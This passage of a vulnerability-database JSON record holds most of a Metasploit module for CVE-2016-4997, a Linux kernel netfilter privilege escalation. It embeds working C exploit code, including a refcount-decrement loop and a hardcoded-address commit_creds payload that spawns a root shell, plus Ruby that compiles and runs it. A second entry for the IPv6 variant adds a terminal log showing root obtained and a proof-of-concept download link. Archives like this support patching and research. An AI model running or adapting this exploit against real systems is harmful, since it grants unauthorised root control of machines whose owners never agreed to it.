\ndata = malloc(MALLOC_SIZE); \n \nif (data == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nmemset(data, 0, MALLOC_SIZE); \n \nrepl = (struct ipt_replace *) data; \nrepl->num_entries = 1; \nrepl->num_counters = 1; \nrepl->size = sizeof(*repl) + sizeof(*target) + 0xffff; \nrepl->valid_hooks = 0; \n \nentry = (struct ipt_entry *) (data + sizeof(struct ipt_replace)); \nentry->target_offset = 74; // overwrite target_offset \nentry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target); \n \nematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry)); \n \nstrcpy(ematch->u.user.name, 
\"icmp\"); \nvoid *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0); \nuint64_t *me = (uint64_t *)(kmatch + 0x58); \n*me = 0xffffffff821de10d; // magic number! \n \nuint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4); \n*match = (uint32_t)kmatch; \n \nematch->u.match_size = (short)0xffff; \n \ntarget = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8); \nuint32_t *t = (uint32_t *)target; \n*t = (uint32_t)kmatch; \n \nprintf(\"[!] Decrementing the refcount. This may take a while...\\n\"); \nprintf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\"); \n \nfor (i = 0; i < 0xffffff/2+1; i++) { \nret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024); \n} \n \nclose(sock); \nfree(data); \nprintf(\"[+] Done! Now run ./pwn\\n\"); \n \nreturn 0; \n} \n \nint main(void) { \nvoid *stack; \nint ret; \n \nprintf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\"); \n \nret = unshare(CLONE_NEWUSER); \n \nif (ret == -1) { \nperror(\"unshare\"); \nreturn -1; \n} \n \nstack = (void *) malloc(65536); \n \nif (stack == NULL) { \nperror(\"malloc\"); \nreturn -1; \n} \n \nclone(decr, stack + 65536, CLONE_NEWNET, NULL); \n \nsleep(1); \n \nreturn 0; \n} \n} \n \n# direct copy of code from exploit-db \npwn = %q{ \n#include <stdio.h> \n#include <string.h> \n#include <errno.h> \n#include <unistd.h> \n#include <stdint.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n#include <assert.h> \n \n#define MMAP_ADDR 0xff814e3000 \n#define MMAP_OFFSET 0xb0 \n \ntypedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); \ntypedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); \n \nvoid __attribute__((regparm(3))) privesc() { \ncommit_creds_fn commit_creds = (void *)0xffffffff810a21c0; \nprepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; \ncommit_creds(prepare_kernel_cred((uint64_t)NULL)); \n} \n 
\nint main() { \nvoid *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); \nassert(payload == (void *)MMAP_ADDR); \n \nvoid *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); \n \nmemset(shellcode, 0, 0x300000); \n \nvoid *ret = memcpy(shellcode, &privesc, 0x300); \nassert(ret == shellcode); \n \nprintf(\"[+] Escalating privs...\\n\"); \n \nint fd = open(\"/dev/ptmx\", O_RDWR); \nclose(fd); \n \nassert(!getuid()); \n \nprintf(\"[+] We've got root!\"); \n \nreturn execl(\"/bin/bash\", \"-sh\", NULL); \n} \n} \n \n# the original code printed a line. However, this is hard to detect due to threading. \n# so instead we can write a file in /tmp to catch. \ndecr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/, \n\"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" ) \n \n# patch in to run our payload \npwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/, \n\"execl(\\\"#{payload_path}\\\", NULL);\") \n \ndef pwn(payload_path, pwn_file, pwn, compile) \n# lets write our payload since everythings set for priv esc \nvprint_status(\"Writing payload to #{payload_path}\") \nwrite_file(payload_path, generate_payload_exe) \ncmd_exec(\"chmod 555 #{payload_path}\") \nregister_file_for_cleanup(payload_path) \n \n# now lets drop part 2, and finish up. 
\nrm_f pwn_file \nif compile \nprint_status \"Writing pwn executable to #{pwn_file}.c\" \nrm_f \"#{pwn_file}.c\" \nwrite_file(\"#{pwn_file}.c\", pwn) \ncmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\") \nregister_file_for_cleanup(\"#{pwn_file}.c\") \nelse \nprint_status \"Writing pwn executable to #{pwn_file}\" \nwrite_file(pwn_file, pwn) \nend \nregister_file_for_cleanup(pwn_file) \ncmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\") \nend \n \nif not compile # we need to override with our pre-created binary \n# pwn file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') \nfd = ::File.open( path, \"rb\") \npwn = fd.read(fd.stat.size) \nfd.close \n# desc file \npath = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') \nfd = ::File.open( path, \"rb\") \ndecr = fd.read(fd.stat.size) \nfd.close \n \n# overwrite the hardcoded variable names in the compiled versions \nenv_ready_file = '/tmp/okDjTFSS' \npayload_path = '/tmp/2016_4997_payload' \nend \n \n# check for shortcut \nif datastore['REEXPLOIT'] \npwn(payload_path, pwn_file, pwn, compile) \nelse \nrm_f desc_file \nif compile \nprint_status \"Writing desc executable to #{desc_file}.c\" \nrm_f \"#{desc_file}.c\" \nwrite_file(\"#{desc_file}.c\", decr) \nregister_file_for_cleanup(\"#{desc_file}.c\") \noutput = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\") \nelse \nwrite_file(desc_file, decr) \nend \nrm_f env_ready_file \nregister_file_for_cleanup(env_ready_file) \n#register_file_for_cleanup(desc_file) \nif not file_exist?(desc_file) \nvprint_error(\"gcc failure output: #{output}\") \nfail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\") \nend \nif target.name == \"Ubuntu\" \nvprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\" \nelsif target.name == \"Fedora\" \nvprint_status \"Executing #{desc_file}, may take around 80s to finish. 
Watching for #{env_ready_file} to be created.\" \nend \ncmd_exec(\"chmod +x #{desc_file}; #{desc_file}\") \nsec_waited = 0 \n \nuntil sec_waited > datastore['MAXWAIT'] do \nRex.sleep(1) \nif sec_waited % 10 == 0 \nvprint_status(\"Waited #{sec_waited}s so far\") \nend \n \nif file_exist?(env_ready_file) \nprint_good(\"desc finished, env ready.\") \npwn(payload_path, pwn_file, pwn, compile) \nreturn \nend \nsec_waited +=1 \nend \nend \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139880/netfilter_priv_esc_ipv4.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Local Privilege Escalation", "edition": 1, "published": "2016-10-10T00:00:00", "title": "Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997"], "modified": "2016-10-10T00:00:00", "id": "EXPLOITPACK:9D752285F4A2795E32FB57E31FD31AB0", "href": "", "sourceData": "# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call\n# Date: 2016.10.8\n# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360\n# Version: Linux kernel <= 4.6.2\n# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic\n# CVE: CVE-2016-4997\n# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10\n# Contact: tyrande000@gmail.com\n\n#DESCRIPTION\n#===========\n#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields,\n#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded.\n\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls\ncompile.sh enjoy enjoy.c pwn pwn.c version.h\nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables\n[sudo] 
password for zhang_q: \nzhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn \npwn begin, let the bullets fly . . .\nand wait for a minute . . .\npwn over, let's enjoy!\npreparing payload . . .\ntrigger modified tty_release . . .\ngot root, enjoy :)\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id\nuid=0(root) gid=0(root) groups=0(root)\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl \n Static hostname: ubuntu\n Icon name: computer-vm\n Chassis: vm\n Machine ID: 355cdf4ce8a048288640c2aa933c018f\n Virtualization: vmware\n Operating System: Ubuntu 16.04.1 LTS\n Kernel: Linux 4.4.0-21-generic\n Architecture: x86-64\nroot@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# \n\n\nProof of Concept:\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40489.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}